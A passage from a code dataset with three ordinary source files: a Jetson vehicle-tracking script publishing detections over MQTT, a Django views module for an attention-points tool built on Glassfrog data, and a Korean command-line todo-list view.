\"{:.2f}\".format(detect.Left),\n \"bottom\": \"{:.2f}\".format(detect.Bottom),\n \"right\": \"{:.2f}\".format(detect.Right),\n \"width_d\": \"{:.2f}\".format(detect.Width),\n \"height_d\": \"{:.2f}\".format(detect.Height),\n \"class\": format(net.GetClassDesc(ID)),\n #\"center\": format(detect.Center),\n \"center_x\": format(int(center[0])),\n \"center_y\": format(int(center[1])),\n \"confidence\": \"{:.2f}\".format(detect.Confidence),\n #\"class\": format(category_index[classes+1]['name']),\n #\"box\": [format(x_min_disp), format(y_min_disp), format(x_max_disp), format(y_max_disp)],\n #\"date\": format(t.month) + '/' + format(t.day) + '/' + format(t.year),\n \"time\": format(currentTime.hour) + ':' + format(currentTime.minute) + ':' + format(currentTime.second)\n #\"frame\": ['height:'+format(height), 'width:'+format(width)],\n #\"score\": \"{:.2f}\".format(score),\n #\"inference_time\": \"{:.4f}\".format(inference_time)\n }\n msg = json.dumps(data)\n topic = f\"pelco/jetson\"\n result = client.publish(topic, msg)\n status = result[0]\n if status == 0:\n logging.debug(f\"Send `{msg}` to topic `{topic}`\")\n else:\n logging.debug(f\"Failed to send message to topic {topic}\")\n\n \n boxes_ids = tracker.update(detection_list)\n \n for box_id in boxes_ids:\n x, y, w, h, id, vehicle_type = box_id\n \n temp = next((obj for obj in detected_objects if obj.id == id), None)\n \n if temp == None:\n detected_objects.append(Detected(x, y, w, h, id, vehicle_type))\n\n else:\n prev_cx, prev_cy = temp.cx, temp.cy\n\n print(prev_cx,prev_cy)\n \n temp.update(x, y, w, h)\n\n print(temp.cx,temp.cy)\n\n img = cv2.circle(img, (prev_cx,prev_cy), 1, (255,0,0), 10)\n img = 
cv2.arrowedLine(img,(prev_cx,prev_cy),(temp.cx,temp.cy),(0,255,0),2)\n #cv2.putText(img,\"Motion Vector\",(prev_cx+10,prev_cy),font,1,(255,255,0),2)\n temp.get_ingress(datetime.now().strftime(\"%H:%M:%S:%f\"))\n temp.get_exgress(datetime.now().strftime(\"%H:%M:%S:%f\"))\n \n \n cv2.putText(img,\"ID:\"+str(id),(x,y-15),font,1,(255,0,0),2)\n\n exgress_times = {}\n ingress_times = {}\n pet_calc = {}\n if len(boxes_ids)>1:\n for box_id in boxes_ids:\n _,_,_,_,id,_ = box_id\n temp = next((obj for obj in detected_objects if obj.id == id), None)\n if temp != None:\n exgress_times[id] = temp.exgress\n ingress_times[id] = temp.ingress\n \n # ! Just Showing some stuff will delete later\n print(\"This is exgress times = \")\n print(exgress_times)\n print(\"This is ingress times = \")\n print(ingress_times)\n \n print(datetime.now())\n tp2 = 650\n for (k1,v1) in exgress_times.items():\n for (k2,v2) in ingress_times.items():\n if k1 != k2:\n if v1 != None and v2 != None:\n pet_calc[k2] = v2 - v1\n pet_text = f\"PET: ID{k2}->ID{k1}={abs(round((v2-v1).total_seconds(),2))}s\"\n print(pet_text)\n cv2.putText(img,pet_text,(900,tp2),font,1,(0,0,255),2)\n tp2 += 30\n\n dt=time.time()-timeStamp\n timeStamp=time.time()\n fps=1/dt\n fpsFilt=.9*fpsFilt + .1*fps\n\n cv2.putText(img,str(round(fpsFilt,1))+' fps',(0,30),font,1,(255,255,0),2)\n\n # Yellow Box\n overlay = img.copy()\n cv2.rectangle(overlay,(150,110),(900,680),(0,255,255),-1)\n alpha = 0.4\n img = image_new = cv2.addWeighted(overlay, alpha, img, 1 - alpha, 0)\n\n # Uncomment for saving the output file \n #result.write(img)\n #cv2.imshow(\"Frame\",img)\n\n #if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n \ncap.release()\ncv2.destroyAllWindows()\nclient.loop_stop()\n\ndf = pd.DataFrame(columns=['id','vehicle_type','ingress_time','egress_time'])\n\nfor x in detected_objects:\n if x.ingress != None or x.exgress != None:\n\n new_row = {'id':x.id,'vehicle_type':x.vehicle_type, 'ingress_time':x.ingress.strftime(\"%H:%M:%S:%f\"),'egress_time':x.exgress.strftime(\"%H:%M:%S:%f\")}\n df = df.append(new_row,ignore_index=True)\n #print(f\"Object ID {x.id}, Object Type = {x.vehicle_type}, Ingress = {x.ingress.strftime(\"%H:%M:%S:%f\")}, Egress = {x.exgress.strftime(\"%H:%M:%S:%f\")}\")\n\ndf.to_csv(\"results.csv\",index=False)\nprint(df.set_index('id').dropna())\n","repo_name":"cpaolini/itmc","sub_path":"jetson/track_detect.py","file_name":"track_detect.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37617704269","text":"from django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views import View\nfrom django.views.generic.edit import UpdateView\nfrom django.views.generic.edit import DeleteView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic import TemplateView\nfrom django.views.generic.base import TemplateResponseMixin\n\nfrom django.db.models import Sum\nfrom django.db.models import Count\nfrom django.db.models import Case, When, Value, IntegerField\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.shortcuts import render, redirect\n\nfrom aps.models import Person\nfrom aps.models import Circle\nfrom aps.models import Role\nfrom aps.models import RoleFiller\n\n\n\n# Helper methods ########################################################################################\n\ndef getObjectsNotInGlassfrog(modelObject, orderBy='name'):\n # get newest import date in db table (as last date of import)\n last_import_date = getLastImportedDate(modelObject)\n object_list = modelObject.objects.filter(last_imported__lt=last_import_date).order_by(orderBy).annotate(is_deleted_in_glassfrog=Value(1, IntegerField()))\n return object_list\n\n\ndef getLastImportedDate(modelObject):\n last_imported_objects = modelObject.objects.order_by('-last_imported')\n if last_imported_objects.exists():\n last_imported_object = last_imported_objects[0]\n last_import_date = last_imported_object.last_imported\n else:\n last_import_date = timezone.now()\n return last_import_date\n\n\ndef sumField(object_list, field_to_sum):\n return round(object_list.aggregate(Sum(field_to_sum))[field_to_sum + '__sum'], 1)\n\n\ndef prepareObjectListContext(object_list, field_to_sum):\n total = 0.0\n if object_list.exists():\n total = sumField(object_list, field_to_sum)\n context = {\n 'total': total,\n 'object_list': object_list\n }\n return context\n\n\ndef preparePersonListContext(object_list):\n # get generic additional context\n context = prepareObjectListContext(object_list, 'contract_fte')\n # add person specific additional context\n try: # can only count/sum when the object_list has related items (i.e. rolefillers) in the query result set. 
That is not always the case, depending on the query done.\n context['total_roles'] = sumField(object_list, 'rolefiller__count')\n context['total_attention_points'] = sumField(object_list, 'rolefiller__attention_points__sum')\n context['total_utilisation'] = Person.calculate_expected_utilisation_percentage(\n context['total_attention_points'], context['total'])\n except:\n pass # dont worry, if we don't have the totals, we dont show them\n return context\n\n\ndef getAnnotatedPersons():\n return Person.objects.annotate(\n Count('rolefiller'),\n # todo: add Round() function to get rid of rounding errors in the sum function\n # docs: https://docs.djangoproject.com/es/1.10/ref/models/expressions/#func-expressions\n Sum('rolefiller__attention_points'),\n Count('rolefiller__role__circle', distinct=True)\n # only count each circle once, when someone has more than one role in a circle\n )\n\ndef getPersonDetailAdditionalContext(person_object):\n additional_context = {}\n # get data related to this person\n annotated_person_object = getAnnotatedPersons().get(id=person_object.id)\n circles = Circle.objects.filter(roles__rolefiller__person__id=person_object.id).distinct().order_by('name')\n leadlink_roles = RoleFiller.objects.all().filter(role__name=\"Lead Link\").filter(person__id=person_object.id)\n leadlink_circles = []\n\n for circle in circles:\n # get all roles this person has in this circle\n circle.person_roles = RoleFiller.objects.filter(role__circle__id=circle.id, person__id=person_object.id).order_by('role')\n circle.total_attention_points = 0\n for rolefill in circle.person_roles:\n circle.total_attention_points += rolefill.attention_points\n\n circle.total_attention_points = round(circle.total_attention_points, 2) # python can be weird with floats\n\n # if this person is Lead Link of this circle, store this circle in his leadlink_circles list\n if leadlink_roles.filter(role__circle=circle):\n circle.additional_context = prepareSubCircleListContextRecursive(circle_object=circle)\n leadlink_circles.append(circle)\n\n # add data to the additional_context, before it is passed to the template\n additional_context['circle_count'] = annotated_person_object.rolefiller__role__circle__count\n additional_context['rolefiller_count'] = annotated_person_object.rolefiller__count\n additional_context['attention_points_sum'] = annotated_person_object.rolefiller__attention_points__sum\n additional_context['circles'] = circles\n additional_context['circles_leadlink'] = leadlink_circles\n\n return additional_context\n\ndef getCircleDetailAdditionalContext(circle__object):\n last_import_date_rolefiller = getLastImportedDate(RoleFiller)\n additional_context = {}\n # add a breadcrumb list of parent circles\n additional_context['breadcrumbs'] = getBreadCrumbList(circle__object)\n # add data to the additional_context, before it is passed to the template\n # store sub-circles, and their total granted and assigned attention points\n additional_context['circles'] = prepareSubCircleListContextRecursive(circle__object)\n # store rolefillers and their total assigned attention points\n additional_context['rolefillers'] = prepareObjectListContext(\n RoleFiller.objects.filter(role__circle__pk=circle__object.pk).order_by(\"person__name\", \"role__name\").annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_rolefiller,then=Value(1)),default=Value(0),output_field=IntegerField())),\n field_to_sum='attention_points')\n # store total granted, assigned attention points\n 
additional_context['attention_points_granted'] = circle__object.attention_points # just an alias of the object's property value\n additional_context['attention_points_assigned'] = round(additional_context['circles']['attention_points_assigned'] + additional_context['rolefillers']['total'], 1)\n additional_context['attention_points_balance'] = round(additional_context['attention_points_granted'] - additional_context['attention_points_assigned'], 1)\n # add Unassigned Roles to additional_context\n additional_context['unassigned_roles'] = Role.objects.filter(circle__pk=circle__object.pk, rolefiller__isnull=True)\n return additional_context\n\n\ndef prepareSubCircleListContextRecursive(circle_object=None, circle_list=None, field_to_sum='attention_points', subcircle_list=None):\n last_import_date_circle = getLastImportedDate(Circle)\n if subcircle_list != None:\n sub_circle_list = subcircle_list\n elif circle_object == None:\n if circle_list == None:\n circle_object = getRootCircle() # needed to get attention points\n sub_circle_list = Circle.objects.all().annotate(is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_circle,then=Value(1)),default=Value(0),output_field=IntegerField()))\n else:\n sub_circle_list = circle_list\n else:\n sub_circle_list = circle_object.sub_circles.all().annotate(is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_circle,then=Value(1)),default=Value(0),output_field=IntegerField()))\n\n context = {\n 'total': 0,\n 'object_list': sub_circle_list\n }\n # get total assigned attention points within subcircles (recursive)\n total_assigned = 0.0\n for sub_circle in sub_circle_list:\n assigned_in_sub_circle = 0.0\n # add this sub_circle's rolefiller assigned points\n circle_rolefiller_list = RoleFiller.objects.filter(role__circle__pk=sub_circle.pk)\n if circle_rolefiller_list.exists():\n assigned_in_sub_circle += sumField(circle_rolefiller_list, field_to_sum)\n else:\n assigned_in_sub_circle += 0\n # add this circle's sub-circles' assigned points (recursive)\n list_context = prepareSubCircleListContextRecursive(sub_circle, None, field_to_sum)\n assigned_in_sub_circle += list_context['attention_points_assigned']\n total_assigned += assigned_in_sub_circle\n # store values in the sub_circle object, to be retrieved in the template\n sub_circle.attention_points_granted = round(sub_circle.attention_points, 1) # alias\n sub_circle.attention_points_assigned = round(assigned_in_sub_circle, 1)\n sub_circle.attention_points_balance = round(sub_circle.attention_points_granted - sub_circle.attention_points_assigned, 1)\n # Add additional circle list specific data to the circle object, to retrieve in the template\n context['attention_points_granted'] = round(context['total'], 1) # alias for convenience\n context['attention_points_assigned'] = round(total_assigned, 1)\n context['attention_points_balance'] = round(context['total'] - total_assigned, 1)\n # context['total_assigned'] = total_assigned\n # context['total_balance'] = circle_object.attention_points - total_assigned\n return context\n\n\ndef getRootCircle():\n # query all circles without a super-circle. 
These could also be deleted circles\n # therefore we order ascending by glassfrog ID, as the root circle PROBABLY has the lowest glassfrog ID\n root_circle = Circle.objects.filter(super_circle__isnull=True).order_by('glassfrog_id').first()\n return root_circle\n\n\ndef getBreadCrumbList(circle_object, bread_crumb_list=None):\n if not bread_crumb_list:\n bread_crumb_list = []\n parent = circle_object.super_circle\n if parent:\n bread_crumb_list.append(parent)\n bread_crumb_list = getBreadCrumbList(parent, bread_crumb_list)\n return bread_crumb_list\n\n\ndef debug(ctx):\n try:\n fail\n except:\n raise Exception(ctx)\n pass\n\ndef getLeadLinkDetails(self, filter_to_use, include_GCC = False):\n # Check if the current user is a leadlink of any circles, and pass the details of the sub-circles to the view\n person = Person.objects.get(user=self.request.user.id)\n leadlink_role_of_circles = RoleFiller.objects.filter(person=person).filter(role__name=\"Lead Link\")\n if leadlink_role_of_circles.exists():\n circles = []\n for rolefiller in leadlink_role_of_circles:\n # Find all the sub-circles where they are a leadlink\n if filter_to_use == \"super_circle\":\n filter = Circle.objects.filter(super_circle__name=rolefiller.role.circle)\n elif filter_to_use == \"rolefiller\":\n filter = Circle.objects.filter(name=rolefiller.role.circle)\n else:\n filter = None\n\n circles_to_add = filter\n for circle in circles_to_add:\n circles.append(circle)\n\n if include_GCC:\n # Special case for GCC - GCC LL should be able to set GCC points\n if rolefiller.role.circle.name == \"General Company Circle\":\n circles.append(Circle.objects.get(name=rolefiller.role.circle))\n\n return circles\n else:\n return None\n\ndef getLeadlinkCircleDetails(self):\n return getLeadLinkDetails(self, \"super_circle\", True)\n\ndef getLeadLinkRolefillerDetails(self):\n return getLeadLinkDetails(self, \"rolefiller\")\n\n# VIEW CLASSES #########################################################################################################\n\n# List View Classes #############################\nclass BullfrogListView(LoginRequiredMixin, View):\n context = {}\n login_url = reverse_lazy('login')\n template_name = '' # should override in subclasses\n\n def get_template_names(self):\n # get and validate requested output format\n output = self.request.GET.get('output') \\\n if self.request.GET.get('output') in ['html','json'] \\\n else 'html'\n # change default template to requested output version\n template_name = self.template_name.rsplit( \".\", 1 )[ 0 ] + \".\" + output\n return [template_name]\n\n def render(self, request):\n if RoleFiller.objects.filter(role__name=\"Lead Link\", person__user=self.request.user.id):\n self.context['is_leadlink'] = True\n else:\n self.context['is_leadlink'] = False\n\n return render(request, self.get_template_names()[0], self.context)\n\n\nclass Index(BullfrogListView):\n template_name = 'index.html'\n\n def get(self, request):\n\n # If the user still has the default password he has to change it\n if request.user.check_password(settings.DEFAULT_PASSWORD):\n return redirect('password_change')\n\n\n # select PEOPLE that have no fte set (usually because they were recently imported from Glassfrog)\n object_list = Person.objects.filter(contract_fte=0).order_by('name')\n self.context['persons_without_fte'] = preparePersonListContext(object_list)\n\n # select CIRCLES that have no attention points set (usually because they were recently imported from Glassfrog)\n object_list = 
Circle.objects.filter(attention_points=0).order_by('name')\n # self.context['circles_without_attention_points'] = prepareCircleListContext(object_list, field_to_sum='attention_points')\n self.context['circles_without_attention_points'] = prepareSubCircleListContextRecursive(None, object_list)\n\n # select ROLEFILLERS that have no attention points set (usually because they were recently imported from Glassfrog)\n object_list = RoleFiller.objects.filter(attention_points=0).order_by('role')\n self.context['rolefillers_without_attention_points'] = prepareObjectListContext(object_list, field_to_sum='attention_points')\n\n # select PEOPLE that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(Person)\n self.context['persons_not_in_glassfrog'] = preparePersonListContext(object_list)\n\n # select CIRCLES that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(Circle)\n self.context['circles_not_in_glassfrog'] = prepareObjectListContext(object_list,\n field_to_sum='attention_points')\n\n # select ROLEFILLER that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(RoleFiller, orderBy='role')\n self.context['rolefillers_not_in_glassfrog'] = prepareObjectListContext(object_list,\n field_to_sum='attention_points')\n\n # select ROLES that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(Role)\n self.context['roles_not_in_glassfrog'] = prepareObjectListContext(object_list,\n field_to_sum='glassfrog_id') # summing up glassfrog_id is a 'hack'. it wont be used, but makes it possible to reuse the generic method\n\n # get information relevant for lead links\n self.context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n self.context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n return self.render(request)\n\n\nclass PeopleView(BullfrogListView):\n template_name = 'people.html'\n def get(self, request):\n last_import_date_person = getLastImportedDate(Person)\n object_list = getAnnotatedPersons().order_by('name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_person,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['persons'] = preparePersonListContext(object_list)\n\n return self.render(request)\n\n\nclass CirclesView(BullfrogListView):\n template_name = 'circles.html'\n def get(self, request):\n last_import_date_circle = getLastImportedDate(Circle)\n object_list = Circle.objects.order_by('name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_circle,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['circles'] = prepareSubCircleListContextRecursive(None, object_list)\n self.context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n\n return self.render(request)\n\n\n\nclass RoleFillersView(BullfrogListView):\n template_name = 'rolefillers.html'\n def get(self, request):\n last_import_date_rolefiller = getLastImportedDate(RoleFiller)\n object_list = RoleFiller.objects.order_by('role__name', 'person__name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_rolefiller,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['rolefillers'] = prepareObjectListContext(object_list, 'attention_points')\n self.context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n return self.render(request)\n\n\nclass RolesView(BullfrogListView):\n template_name = 'roles.html'\n def get(self, request):\n last_import_date_role = 
getLastImportedDate(Role)\n object_list = Role.objects.order_by('circle', 'name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_role,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['roles'] = prepareObjectListContext(object_list, 'glassfrog_id') # hack: will create an unused sum of glassfrog_id's, to be able to reuse the generic method.\n return self.render(request)\n\n\n# Update View Classes ###################################\nclass BullfrogUpdateView(LoginRequiredMixin, UpdateView):\n login_url = reverse_lazy('login')\n template_name = 'generic_update_form.html'\n fields = ['attention_points'] # default, should be overridden by subclass if you want something else\n delete_url = '_delete' # placeholder, should be overridden by subclass with something like 'person_delete'\n success_url = reverse_lazy(\n 'index') # where to return after update, can be overridden by subclass, or by passing a ?next= url parameter\n\n def get_success_url(self):\n # look in the url for the ?next= paramater, and use that to redirect on success, or default to whatever the base class returns\n return self.request.GET.get('next', super(UpdateView, self).get_success_url())\n\n\nclass PersonUpdate(BullfrogUpdateView):\n model = Person\n delete_url = 'person_delete'\n fields = ['contract_fte']\n\n\nclass CircleUpdate(BullfrogUpdateView):\n model = Circle\n delete_url = 'circle_delete'\n\n\nclass RoleFillerUpdate(BullfrogUpdateView):\n model = RoleFiller\n delete_url = 'rolefiller_delete'\n\n\nclass RoleUpdate(BullfrogUpdateView):\n model = Role\n delete_url = 'role_delete'\n success_url = reverse_lazy('roles')\n fields = [] # overriding the default\n\n\n# Delete View Classes ###################################\nclass BullfrogDeleteView(LoginRequiredMixin, DeleteView):\n login_url = reverse_lazy('login')\n template_name = 'generic_delete_form.html'\n success_url = reverse_lazy('index')\n\n\nclass PersonDelete(BullfrogDeleteView):\n model = Person\n\n\nclass CircleDelete(BullfrogDeleteView):\n model = Circle\n\n\nclass RoleFillerDelete(BullfrogDeleteView):\n model = RoleFiller\n\n\nclass RoleDelete(BullfrogDeleteView):\n model = Role\n\n\n# Detail View Classes #############################\nclass BullfrogDetailView(LoginRequiredMixin, DetailView):\n login_url = reverse_lazy('login')\n template_name = '' # should override in subclasses\n\n def get_template_names(self):\n # get and validate requested output format\n output = self.request.GET.get('output') \\\n if self.request.GET.get('output') in ['html','json'] \\\n else 'html'\n # change default template to requested output version\n template_name = self.template_name.rsplit( \".\", 1 )[ 0 ] + \".\" + output\n return [template_name]\n\n\nclass PersonDetailView(BullfrogDetailView):\n model = Person\n template_name = \"person.html\"\n\n def get_context_data(self, **kwargs):\n # get the context for this object that the super class auto generates (object details)\n context = super(PersonDetailView, self).get_context_data(**kwargs)\n # add additional data to the context, before it is passed to the template\n context['additional_context'] = getPersonDetailAdditionalContext(self.object)\n\n return context\n\n\nclass CircleDetailView(BullfrogDetailView):\n model = Circle\n template_name = \"circle.html\"\n\n def get_context_data(self, **kwargs):\n # get the context for this object that the super class auto generates (object details)\n context = super(CircleDetailView, self).get_context_data(**kwargs)\n # add 
additional data to the context, before it is passed to the template\n context['additional_context'] = getCircleDetailAdditionalContext(self.object)\n context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n\n rolefillers = context['additional_context']['rolefillers']['object_list']\n personRolesList = []\n people = []\n for obj in rolefillers:\n if not obj.person.pk in people:\n people.append(obj.person.pk)\n personRoles = rolefillers.filter(person__pk=obj.person.pk)\n personRolesList.append(prepareObjectListContext(personRoles,'attention_points'))\n\n context['additional_context']['roles_per_person'] = personRolesList\n\n return context\n\n\nclass MeView(PersonDetailView):\n template_name = \"me.html\"\n\n def get(self, request):\n # If the user still has the default password he has to change it\n if request.user.check_password(settings.DEFAULT_PASSWORD):\n return redirect('password_change')\n return super(MeView, self).get(request)\n\n # Get the Person object belonging to the logged in user as the object for this view (instead of passing an object via url, like is the default for a detail view)\n def get_object(self):\n return Person.objects.get(user=self.request.user.id)\n\n def get_context_data(self, **kwargs):\n # get the context for this object that the super class auto generates (object details)\n context = super(MeView, self).get_context_data(**kwargs)\n # add additional data to the context, before it is passed to the template\n context['additional_context'] = getPersonDetailAdditionalContext(self.object)\n\n # get information relevant for lead links\n if RoleFiller.objects.filter(role__name=\"Lead Link\", person__user=self.request.user.id):\n context['is_leadlink'] = True\n leadlink_of_circles = context['additional_context']['circles_leadlink']\n\n def get_object_from_leadlinks_circles(object, role_or_circle):\n relevant_objects = []\n\n for circle in leadlink_of_circles:\n try:\n if role_or_circle == \"role\":\n circle_objects = object.filter(role__circle=circle)\n elif role_or_circle == \"supercircle\":\n circle_objects = object.filter(super_circle=circle)\n else:\n circle_objects = object.filter(circle=circle)\n\n for circle_object in circle_objects:\n relevant_objects.append(circle_object)\n except:\n pass\n\n return relevant_objects\n\n # show roles not in glassfrog\n roles_not_in_gf = getObjectsNotInGlassfrog(Role)\n context['roles_not_in_glassfrog'] = get_object_from_leadlinks_circles(roles_not_in_gf, \"circle\")\n\n # show rolefillers that have no attention points\n roles_with_no_ap = RoleFiller.objects.filter(attention_points=0).order_by('role')\n context['rolefillers_without_attention_points'] = get_object_from_leadlinks_circles(roles_with_no_ap, \"role\")\n\n # select rolefillers that are no longer in Glassfrog\n rolefillers_not_in_gf = getObjectsNotInGlassfrog(RoleFiller, orderBy='role')\n context['rolefillers_not_in_glassfrog'] = get_object_from_leadlinks_circles(rolefillers_not_in_gf, \"role\")\n\n # show circles that are no longer in Glassfrog\n circles_not_in_gf = getObjectsNotInGlassfrog(Circle)\n context['circles_not_in_glassfrog'] = get_object_from_leadlinks_circles(circles_not_in_gf, \"circle\")\n\n # show circles that have no attention points\n circles_with_no_ap = Circle.objects.filter(attention_points=0).order_by('name')\n relevant_circles_with_no_ap = get_object_from_leadlinks_circles(circles_with_no_ap, \"supercircle\")\n circle_list_prepared = 
prepareSubCircleListContextRecursive(subcircle_list=relevant_circles_with_no_ap)\n context['circles_without_attention_points'] = circle_list_prepared\n\n # get details of the circles that they are lead link\n leadlink_circles_list = prepareSubCircleListContextRecursive(subcircle_list=leadlink_of_circles)\n context['leadlink_circles'] = leadlink_circles_list\n\n context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n return context\n\n\n# IMPORT VIEW ##########################################################################################################\n\nfrom aps.utils.GlassfrogImporter import GlassfrogImporter\n\nclass DoImport(LoginRequiredMixin, View):\n login_url = reverse_lazy('login')\n\n def get(self, request):\n imp = GlassfrogImporter()\n imp.doImport()\n\n numPeopleInGlassfrog = len(imp.people)\n numPeopleInBullfrog = len(Person.objects.all())\n successPeople = True if numPeopleInGlassfrog <= numPeopleInBullfrog else False\n\n numCirclesInGlassfrog = len(imp.circles)\n numCirclesInBullfrog = len(Circle.objects.all())\n successCircles = True if numCirclesInGlassfrog <= numCirclesInBullfrog else False\n\n numRolesInGlassfrog = len(imp.roles)\n numRolesInBullfrog = len(Role.objects.all())\n successRoles = True if numRolesInGlassfrog <= numRolesInBullfrog else False\n\n numRoleFillersInGlassfrog = len(imp.rolefillers)\n numRoleFillersInBullfrog = len(RoleFiller.objects.all())\n successRoleFillers = True if numRoleFillersInGlassfrog <= numRoleFillersInBullfrog else False\n\n messages = [\n 'People Import successful:' + str(successPeople),\n 'Number of people in Glassfrog:' + str(numPeopleInGlassfrog),\n 'Number of people in Bullfrog:' + str(numPeopleInBullfrog),\n '',\n 'Circles Import successful:' + str(successCircles),\n 'Number of circles in Glassfrog:' + str(numCirclesInGlassfrog),\n 'Number of circles in Bullfrog:' + str(numCirclesInBullfrog),\n '',\n 'Roles Import successful:' + str(successRoles),\n 'Number of roles in Glassfrog:' + str(numRolesInGlassfrog),\n 'Number of roles in Bullfrog:' + str(numRolesInBullfrog),\n '',\n 'Role Fillers Import successful:' + str(successRoleFillers),\n 'Number of role fillers in Glassfrog:' + str(numRoleFillersInGlassfrog),\n 'Number of role fillers in Bullfrog:' + str(numRoleFillersInBullfrog),\n ]\n\n return render(request, 'import.html', {'messages': messages})\n\n# ABOUT VIEW ##########################################################################################################\n\nclass AboutView(TemplateView):\n context = {}\n template_name = \"about.html\"\n","repo_name":"themobilecompany/Bullfrog","sub_path":"aps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
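The `get_template_names` override in `BullfrogListView` and `BullfrogDetailView` above switches a view between its `.html` and `.json` template based on a whitelisted `?output=` query parameter. A minimal standalone sketch of that pattern (plain function, no Django dependency; names are illustrative):

    def pick_template(base_template, requested_output):
        # Fall back to 'html' unless the request asks for a known format.
        output = requested_output if requested_output in ('html', 'json') else 'html'
        # Swap the template extension, e.g. 'index.html' -> 'index.json'.
        return base_template.rsplit('.', 1)[0] + '.' + output

    assert pick_template('index.html', 'json') == 'index.json'
    assert pick_template('index.html', 'xml') == 'index.html'  # unknown formats fall back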
+{"seq_id":"23542919577","text":"from datetime import datetime\n\nfrom todo_detail_view import TodoDetailView\nfrom constants import *\nfrom model import Repeat\nfrom todo_view_model import TodoViewModel\n\nDAY_STR = ('월', '화', '수', '목', '금', '토', '일')\n\n\nclass TodoListView:\n\n def __init__(self):\n self.viewmodel = TodoViewModel()\n\n def list(self):\n self.printlist()\n\n def search(self):\n print('검색할 항목을 선택하세요')\n print('1. 제목')\n print('2. 완료 여부')\n print('3. 진행도')\n print('4. 중요도')\n print('5. 내용')\n print('6. 날짜')\n choice = int(input('>>> '))\n\n if choice == 1:\n name = input('제목: ')\n self.printlist(name=name)\n\n if choice == 2:\n done = input('완료 여부(True/False): ')\n self.printlist(done=(done == 'True'))\n\n if choice == 3:\n try:\n progress = int(input('진행도: '))\n self.printlist(progress=progress)\n except ValueError:\n print(\"정수를 입력하세요.\")\n\n if choice == 4:\n try:\n importance = int(input('중요도: '))\n self.printlist(importance=importance)\n except ValueError:\n print(\"정수를 입력하세요.\")\n\n if choice == 5:\n content = input('내용: ')\n self.printlist(content=content)\n\n if choice == 6:\n try:\n date = datetime.strptime(input('날짜 (yyyy-mm-dd): '), '%Y-%m-%d').date()\n self.printlist(date=date)\n except ValueError:\n print('잘못된 형식입니다.')\n\n def printlist(self, **kwargs):\n for obj in self.viewmodel.get_list(**kwargs):\n print(f'날짜: {obj.date.strftime(\"%Y-%m-%d\")}')\n print(f'제목: {obj.name}')\n print(f'완료 여부: {obj.done}')\n print(f'진행도: {obj.progress}')\n print(f'중요도: {obj.importance}')\n if obj.repeat:\n print(f'반복 날짜: {\",\".join(day for i, day in enumerate(DAY_STR) if 1 << i & obj.repeat.day)}')\n print(f'반복 주기(주): {obj.repeat.week_interval}')\n print(f'만료 날짜: {obj.repeat.due.strftime(\"%Y-%m-%d\")}')\n print(f'내용: {obj.content}')\n print()\n\n while True:\n print('TODO 상세보기: {id}')\n print('종료: 엔터')\n s = input('>>> ')\n if not s:\n break\n id = int(s)\n TodoDetailView(id).load()\n print()\n\n def create(self):\n try:\n date = datetime.strptime(input('날짜 (yyyy-mm-dd): '), '%Y-%m-%d').date()\n except ValueError:\n print('잘못된 형식입니다.')\n return\n name = input('이름: ')\n content = input('내용: ')\n has_repeat = input('반복 여부(True/False): ')\n repeat = None\n if has_repeat == 'True':\n try:\n day = sum(1 << DAY_STR.index(d) for d in input('요일 (콤마로 구분): ').split(','))\n except ValueError:\n print('잘못된 형식입니다.')\n return\n try:\n week_interval = int(input('반복 간격 (주): '))\n except ValueError:\n print(\"정수를 입력하세요.\")\n return\n try:\n due = datetime.strptime(input('만료 날짜 (yyyy-mm-dd): '), '%Y-%m-%d').date()\n except ValueError:\n print('잘못된 형식입니다.')\n return\n repeat = Repeat(day=day, week_interval=week_interval, due=due)\n\n try:\n progress = int(input('진행도: '))\n except ValueError:\n print(\"정수를 입력하세요.\")\n return\n try:\n importance = int(input('중요도: '))\n except ValueError:\n print(\"정수를 입력하세요.\")\n return\n v = self.viewmodel.create(date, name, content, repeat=repeat,\n done=False, progress=progress, importance=importance)\n if v == CODE_INVALID_DATE:\n print('날짜가 잘못되었습니다.')\n elif v == CODE_INVALID_PROGRESS:\n print('진행도가 잘못되었습니다.')\n elif v == CODE_INVALID_IMPORTANCE:\n print('중요도가 잘못되었습니다.')\n\n def load(self):\n\n while True:\n print('1. 목록 출력')\n print('2. 검색')\n print('3. 추가')\n print('4. 
